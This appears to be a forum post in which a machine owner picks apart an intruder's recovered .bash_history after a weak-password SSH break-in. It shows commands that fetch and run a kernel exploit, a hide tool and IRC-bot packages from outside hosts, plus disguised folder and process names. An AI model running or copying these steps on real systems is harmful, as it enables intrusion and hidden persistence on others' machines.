I had something allong these lines happen to a box of a friend.. Just a 'toy' linux box..
An ssh 'knocker' found a weak user (user: print, passwd: print (that's plain stupid))

A few minutes later came the 'hacker'
Or should I say lamer.. let's disect..

.bash_history
Code:
w
passwd
changed password
Code:
w
cd /var/tmp
ls
hostname -f
mkdir " "
cd " "
A nice hard to find folder
Code:
ls
pwd
wget esteticu.org/mremap_pte
chmod +x mremap_pte
./mremap_pte
old kernel exploit (ptrace) won't work
Code:
w
rm -rf mremap_pte
wget www.partyzone.go.ro/hide.tgz
tar xzvf hide.tgz
./hide root 0 0
Dude.. you arn't root.. that won't work
Code:
ls
rm -rf hide
rm -rf hide.tgz
wget ideo.go.ro/psy6667.tgz
tar xzvf psy6667.tgz
rm -rf psy6667.tgz
cd psybnc
chmod +x psybnc
mv psybnc backup
PATH="./"
backup
ls
rm -rf backup
kilall -9 psybnc
rm -rf psybnc
exit
Ok.. so you installed a irc-bot as a 'normal' user behind a NAT (he could have known this won't work) while you have a valid login (with your own password)..
Code:
export PATH='.'
psybnc
ls
exit
Still won't work
Code:
export PATH='.'
crond
exit
I don't get it.. perhaps there is also a 'fake' crond exec in the psybnc package..
Code:
ww
typo
Code:
w
cd /var/tmp
ls
cd " "
ls
killall -9 psybnc
rm -rf psbnc
uname -a
Should have done that a bit earlier.. could have saved you some time
Code:
wget www.skimy.go.ro/psy.tgz
tar xzvf psy.tgz
cd psybnc
sh
ls
killall -9 psybnc
rm -rf psybnc
rm -rf backup
cd ..
ls
rm -rf psy.tgz
rm -rf psybnc
OK he found out such a bot won't work behind a NAT
Code:
wget artist.idilis.ro/xpl.tgz
tar xzvf xpl.tgz
rm -rf xpl.tgz
mv mech "..   .bot"
cd "..   .bot"
sh
And that's where the bot send enough mail to trigger the ISP to kill the connection :P

Leaving the poor 'hacker' disconnected and all the evidence of his mishaps there for us to look at...